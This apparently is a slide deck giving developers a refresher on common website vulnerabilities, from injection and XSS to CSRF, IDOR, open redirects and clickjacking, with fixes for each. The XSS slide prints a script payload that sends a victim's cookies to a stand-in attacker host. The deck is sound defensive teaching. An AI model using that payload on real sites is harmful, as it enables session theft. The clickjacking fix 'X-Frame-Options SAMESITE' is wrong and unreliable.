Website Security Refresher

This is a non-exhaustive list

Some of the most common issues

Please chip in comments as we go

 

Passwords

Simplest way to compromise a site is to get hold of someone's password

 

 

Potential fixes

• Secure password policies
• 2FA - Authenticator, YubiKey,
  Face ID, Windows Hello, etc
• Password managers
• Least privilege permissions
• SSO/AAD/Google/etc logins

Injection

Injection attacks are common, a lot of framework support for these now. But still need to be aware.

 

Also 2nd order SQL injection or similar can catch you out

 

Potential Fixes

• Sanitise user inputs, treat all user input as suspicious
• Build SQL etc view parametrised library functions
• Least privilege (RO access to DBs etc)

Security Misconfiguration

 

Examples:

• Allowing source files to be downloaded
• Leaving ports open
• Running with custom errors off
• Leaving debug mode on
• Directory listing enabled
• Insecure versions
• Running unnecessary software on servers
• Not changing passwords or keys

Sharing sensitive data

 

Examples:

• Putting private files on public blob
• Leaving passwords in public GitHub
• Not encrypting cards/personal details
• Hashing passwords without salt/simple algorithm
• Using HTTP
• Any custom download code is a risk

XSS

Example:
Output a message from QS like

 

?message=Payment failed

Have in the page:

 

<%= Request["message"] %>

 

Change message to

><script>document.location='http://www.attacker.com/cgi-bin/cookie.cgi?foo='+document.cookie</script>

XSS

Potential fixes:

Avoid Html.Raw etc

 

Sanitise user input

Never directly output something a user enters

In the example a set of predefined messages ?message=ERR001

Content Security Policy

 

XSRF/CSRF

Examples:

You're logged into Umbraco, get an email with a link that looks fine. Click the link, which actually submits a form to create a new admin user in your Umbraco.

 

The attacked has used your access to create the user, couldn't do it themselves.

 

Potential Fixes

Anti-Forgery tokens

 

Insecure Direct Object References

Examples:

I view my order at /order/123456

I change the URL to /order/123455 and it shows me someone else's order details

 

Potential fixes:

• Non-sequential/non-guessable URLs
• Authenticate the user when showing personal details

Open Redirects

Examples:

1. Create a fake website looks exactly the same
2. Place a malicious link in the legit websites URL
3. User goes to bad website unknowingly

 

Potential fixes:

• Don't have open redirects on the site
• Validate redirects to same site only

Click Jacking

Examples:

User puts a transparent layer over the top of the site which is loaded in iframe, you think you're clicking/typing on the site you're typing in their site instead.

 

Potential fixes:

• X-Frame-Options SAMESITE

Summary

 

 

• Think about the potential exploits when designing/developing something
• Certain things should raise red flags: code that downloads files from the system, sequential ids in URLs, roll your own logins. These need extra thought
• Never trust anything from users, assume all requests are malicious